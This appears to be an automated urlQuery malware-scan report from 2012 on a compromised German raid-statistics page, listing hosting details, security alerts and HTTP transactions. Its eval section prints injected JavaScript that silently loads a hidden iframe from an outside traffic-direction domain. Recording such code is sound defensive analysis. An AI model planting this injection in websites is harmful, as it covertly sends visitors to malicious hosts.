Overview

URL: http://raidstats.liebesbude.de/oct_07/07_10_04_void/
IP: 85.14.216.82
ASN: AS13301 UNITED COLO GmbH
Location: Germany
Report completed: 2012-11-09 07:13:43 CET
urlQuery Alerts:
  - Detected malicious iframe injection
  - Detected SutraTDS URL pattern


Settings

UserAgent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer:
Adobe Reader: 8.0
Java: 1.6.0_26


Intrusion Detection Systems

Suricata w/ Emerging Threats Pro: No alerts detected
Snort w/ Sourcefire VRT: No alerts detected


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 85.14.216.82

Date                | Alerts / IDS | URL                                                          | IP
2012-11-21 16:41:23 | 2 / 0        | http://raidstats.liebesbude.de/dez_07/07_12_19_supremus_kill | 85.14.216.82
2012-11-21 16:37:54 | 2 / 0        | http://raidstats.liebesbude.de/oct_07/07_10_03_komplett      | 85.14.216.82
2012-11-21 09:53:48 | 2 / 0        | http://raidstats.liebesbude.de/oct_07/07_10_03_komplett      | 85.14.216.82
2012-11-21 09:45:15 | 2 / 0        | http://raidstats.liebesbude.de/dez_07/07_12_19_supremus_kill | 85.14.216.82
2012-11-18 16:53:07 | 2 / 0        | http://raidstats.liebesbude.de/08_02_20_akama_kill           | 85.14.216.82
2012-11-18 00:27:56 | 2 / 0        | http://raidstats.liebesbude.de/08_02_20_akama_kill/          | 85.14.216.82

Last 6 reports on ASN: AS13301 UNITED COLO GmbH

Date                | Alerts / IDS | URL                                  | IP
2013-02-11 17:03:51 | 2 / 0        | http://tobisre.to.funpic.de/catalog  | 213.202.225.65
2013-02-11 12:57:04 | 0 / 2        | http://svgerlfangen.funpic.de/       | 213.202.225.33
2013-02-10 13:09:14 | 0 / 0        | http://213.202.225.205               | 213.202.225.205
2013-02-08 21:41:55 | 0 / 0        | http://alexis.al.ohost.de            | 213.202.225.39
2013-02-08 11:55:10 | 1 / 5        | http://kiki.ki.funpic.de/            | 213.202.225.59
2013-02-08 03:10:19 | 0 / 4        | http://buntesegel.de/887.jar         | 89.163.160.242

Last 6 reports on domain: raidstats.liebesbude.de

Date                | Alerts / IDS | URL                                                          | IP
2012-11-21 16:41:23 | 2 / 0        | http://raidstats.liebesbude.de/dez_07/07_12_19_supremus_kill | 85.14.216.82
2012-11-21 16:37:54 | 2 / 0        | http://raidstats.liebesbude.de/oct_07/07_10_03_komplett      | 85.14.216.82
2012-11-21 09:53:48 | 2 / 0        | http://raidstats.liebesbude.de/oct_07/07_10_03_komplett      | 85.14.216.82
2012-11-21 09:45:15 | 2 / 0        | http://raidstats.liebesbude.de/dez_07/07_12_19_supremus_kill | 85.14.216.82
2012-11-18 16:53:07 | 2 / 0        | http://raidstats.liebesbude.de/08_02_20_akama_kill           | 85.14.216.82
2012-11-18 00:27:56 | 2 / 0        | http://raidstats.liebesbude.de/08_02_20_akama_kill/          | 85.14.216.82



JavaScript

Executed Scripts (5)


Executed Evals (1)

#1 JavaScript::Eval (size: 561, repeated: 1) - Alert detected on script (Severity: 2)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://infolinesw.biz/in.cgi?2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://infolinesw.biz/in.cgi?2');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

Executed Writes (0)



HTTP Transactions (10)


Transaction 1
Request:
GET /oct_07/07_10_04_void/custom.css HTTP/1.1
Host: raidstats.liebesbude.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/oct_07/07_10_04_void/
Response:
HTTP/1.1 200 OK
Content-Type: text/css
Date: Fri, 09 Nov 2012 06:35:27 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Thu, 04 Oct 2007 20:37:05 GMT
Etag: "360b4-0-bfccde40"
Accept-Ranges: bytes
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

Transaction 2
Request:
GET /oct_07/07_10_04_void/tooltip.js HTTP/1.1
Host: raidstats.liebesbude.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/oct_07/07_10_04_void/
Response:
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Date: Fri, 09 Nov 2012 06:35:27 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Thu, 04 Oct 2007 20:36:53 GMT
Etag: "36090-40e-bf15c340"
Accept-Ranges: bytes
Content-Length: 1038
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

Transaction 3
Request:
GET /oct_07/07_10_04_void/recap.css HTTP/1.1
Host: raidstats.liebesbude.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/oct_07/07_10_04_void/
Response:
HTTP/1.1 200 OK
Content-Type: text/css
Date: Fri, 09 Nov 2012 06:35:27 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Thu, 04 Oct 2007 20:36:56 GMT
Etag: "3609a-10f3-bf438a00"
Accept-Ranges: bytes
Content-Length: 4339
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

Transaction 4
Request:
GET /oct_07/07_10_04_void/img/Help.gif HTTP/1.1
Host: raidstats.liebesbude.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/oct_07/07_10_04_void/
Response:
HTTP/1.1 200 OK
Content-Type: image/gif
Date: Fri, 09 Nov 2012 06:35:27 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Thu, 04 Oct 2007 20:36:51 GMT
Etag: "3608a-4af-bef73ec0"
Accept-Ranges: bytes
Content-Length: 1199
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

Transaction 5
Request:
GET /oct_07/07_10_04_void/rengine.js HTTP/1.1
Host: raidstats.liebesbude.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/oct_07/07_10_04_void/
Response:
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Date: Fri, 09 Nov 2012 06:35:27 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Thu, 04 Oct 2007 20:36:56 GMT
Etag: "36098-1150-bf438a00"
Accept-Ranges: bytes
Content-Length: 4432
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

Transaction 6
Request:
GET /oct_07/07_10_04_void/ HTTP/1.1
Host: raidstats.liebesbude.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Date: Fri, 09 Nov 2012 06:35:27 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Mon, 25 Jul 2011 08:56:14 GMT
Etag: "360a4-6a18-fcc8c780"
Accept-Ranges: bytes
Content-Length: 27160
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

Transaction 7
Request:
GET /favicon.ico HTTP/1.1
Host: raidstats.liebesbude.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Response:
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 09 Nov 2012 06:35:29 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Language: en

Transaction 8
Request:
GET /favicon.ico HTTP/1.1
Host: raidstats.liebesbude.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Response:
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 09 Nov 2012 06:35:32 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Language: en

Transaction 9
Request:
GET /in.cgi?2 HTTP/1.1
Host: infolinesw.biz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/oct_07/07_10_04_void/
Response: (none recorded in the report)

Transaction 10
Request:
GET /counter/c2.php?lang=en&id=indx&uid=B08F4AF1 HTTP/1.1
Host: www.lossendil.fr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/oct_07/07_10_04_void/
Response: (none recorded in the report)